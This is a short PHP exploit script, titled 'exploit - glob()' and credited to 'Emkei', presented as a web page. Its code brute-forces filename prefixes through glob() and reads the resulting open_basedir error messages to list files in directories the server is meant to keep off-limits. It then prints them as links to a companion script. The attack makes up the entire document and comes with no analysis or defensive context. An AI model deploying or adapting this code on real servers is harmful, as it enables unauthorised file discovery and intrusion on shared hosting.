<!DOCTYPE HTML public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
 <meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
 <title>exploit - glob()</title>
</head>
<body>
<?php
/* written by Emkei */
$path = realpath($_GET['path']); // reads GET variable $path from URL
if (!$path) $path = '/'; // default path

if (substr($path,-1,1)!='/') $path .= '/';
echo '<b>',$path=='/'?'/':substr($path,0,strlen($path)-1),"</b><br>\n"; // absolute path in the top

// chars used in filename, the first one must be empty
$foo = array('','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9','+','-',' ',',','.','_',';','!','(',')','=','%','&','$','#','@','~');

foreach ($foo as $y) { // prephase speeds up the script via selection
 $param = $path.$y.'*';
 @glob($param); // glob(), result is an error message (because of open_basedir)
 eregi('(/.*owned by uid)', $php_errormsg, $regs); // reads filename from the last error message
 $bar[] = substr(basename(substr($regs[0],0,strlen($regs[0])-13)),0,1);
}
$bar = array_unique($bar);

foreach ($foo as $k) { // third phase
 foreach ($foo as $j) { // second phase
  foreach ($bar as $i) { // first phase (result of the prephase)
   $char = $i.$j.$k;
   $param = $path.$char.'*';
   @glob($param); // glob(), result is an error message (because of open_basedir)
   eregi('(/.*owned by uid)', $php_errormsg, $regs); // reads filename from the last error message
   $files[] = basename(substr($regs[0],0,strlen($regs[0])-13));
  }
 }
}

sort($files);
foreach (array_unique($files) as $dump) { // output
 echo '<a href="glob2.php?path=',$path,$dump,'" title="',$path,$dump,'">',$dump,"</a><br>\n";
}
?>
</body>
</html>